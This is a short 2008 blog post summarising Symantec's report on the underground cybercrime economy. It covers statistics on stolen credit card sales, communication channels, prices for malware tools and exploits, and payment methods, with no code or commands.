Tuesday, November 25, 2008

Symantec Released "Underground Economy Report"

Worth reading, http://www.symantec.com/business/theme.jsp?themeid=threatreport
Here are some interesting points:

Economic Figures:
- Underground business matured and became like traditional business model.
- The estimated potential worth of all credit cards information sold is $5.3 billion
- "Reported" transactions using stolen credit cards, valued $4.3 million
- Value of "Reported" advertised goods was over $276 million, with around 60% of that value from Credit Cards, 16% from identity theft, and 10% from selling server accounts. these numbers does not calculate the usage of these stolen information.
- Specialization in the services offered is becoming an increasing trend, because of the complexity of the business model. the tools need to be developed, used by attackers, goods and services must be marketed and traded.
- There is a certain amount of collaboration between different underground groups and organizations, specially at the administrative level

Groups and Organizations:
- Channels used for communication: IRC rooms , and Web based Forums
- IRC channels are used more than web forum
- Almost 80% of IRC servers life span is relatively short (7days - 30 days)
- Members of forums and IRC rooms are changing identities more often

Goods & Services:
- Almost 70% of goods and services sold are "credit card information", "financial accounts", and "spam & phishing information"
- Users also sell safe "drop" physical location, in order to safely receive physical goods without being traced.

Malicious code:
- Banking trojans, backdoors, password stealers, and all other types are trying mainly to evade AntiVirus detection
- 163% increase of new Malicious code in 2nd half of 2007
- The focus now is not on new malicious code, as it is on Packers, and Binders (bind malicious code with legitimate one)
- Binders and Packers are the most costly tools with price range (10-100$)
- Exploits targeting specific site (banking) is the most expensive exploit with avg. price 740$
- Remote File Include (RFI) exploits for 500 links will cost 200$
- ecommerce exploit (50 shop site) is traded for 150$
- Browser exploits, cost is 37$
- The most common php shells used with RFI, are C99/R57 shells and php SPAM mailer

Payment System:
- Almost 65% of payments are through online currency accounts which convert money into electronic money based on metals , such as gold or silver

No comments: